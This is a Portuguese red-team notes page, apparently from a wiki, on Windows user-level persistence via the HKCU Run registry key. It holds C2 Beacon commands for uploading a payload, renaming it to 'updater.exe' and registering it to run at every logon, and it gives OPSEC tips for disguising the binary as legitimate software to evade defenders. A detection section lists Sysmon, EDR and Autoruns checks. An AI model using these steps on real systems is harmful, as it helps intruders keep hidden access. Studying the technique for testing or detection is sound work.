search
LinkedinTryHackme

Registry Run Key (HKCU)

hashtag
Descrição

Adiciona uma entrada na chave de registro:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run

Isso executa um binário a cada login do usuário.

  • Persistência em nível de usuário (não precisa de admin).

  • Executa sempre que o usuário fizer logon.

hashtag
Enumeração

  • Beacon (C2)

reg_query HKCU Software\Microsoft\Windows\CurrentVersion\Run

  • PowerShell

Get-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run"

hashtag
Attack / Execution

  • Preparação e execução da persistência

cd C:\Users\<user>\AppData\Local\Microsoft\WindowsApps
upload C:\Payloads\http_x64.exe
mv http_x64.exe updater.exe

reg_set HKCU Software\Microsoft\Windows\CurrentVersion\Run Updater REG_EXPAND_SZ %LOCALAPPDATA%\Microsoft\WindowsApps\updater.exe

  • Objetivo: garantir que o payload seja executado automaticamente em cada logon do usuário.

  • Tática MITRE ATT&CK: Persistence → Registry Run Keys / Startup Folder (T1547.001)

  • Fase do ataque: pós-exploração / pós-comprometimento inicial, manutenção de acesso.

hashtag
Remoção

  • Use reg_delete para remover uma chave ou valor do registro quando não for mais necessário.

hashtag
Detecção

  • Sysmon: Event ID 13 → alteração de valor no registro.

  • EDR: monitoramento de execução de binários desconhecidos no logon.

  • Autoruns (Sysinternals): mostra programas registrados para inicialização.

  • Auditoria de Objeto: pode registrar alteração se configurada.

Blue Team geralmente procura por:

  • Valores recém-criados ou alterados.

  • Caminhos não padronizados (AppData, Temp, USB).

  • Mascaramento em nomes de binários/entradas.

hashtag
OPSEC

  • Vantagens:

    • Não exige privilégios elevados.

    • Fácil implementação.

    • Persistência confiável (executa sempre no logon).

  • Desvantagens:

    • Técnica muito conhecida e monitorada.

    • Fácil de identificar manualmente com regedit ou Autoruns.

  • Boas práticas de OPSEC:

    • Usar nomes consistentes com softwares legítimos (ex: Updater, Adobe, OneDrive).

    • Colocar binários em pastas plausíveis (WindowsApps, Microsoft, Updater).

    • Evitar caminhos óbvios como %Temp% ou %Public%.

Last updated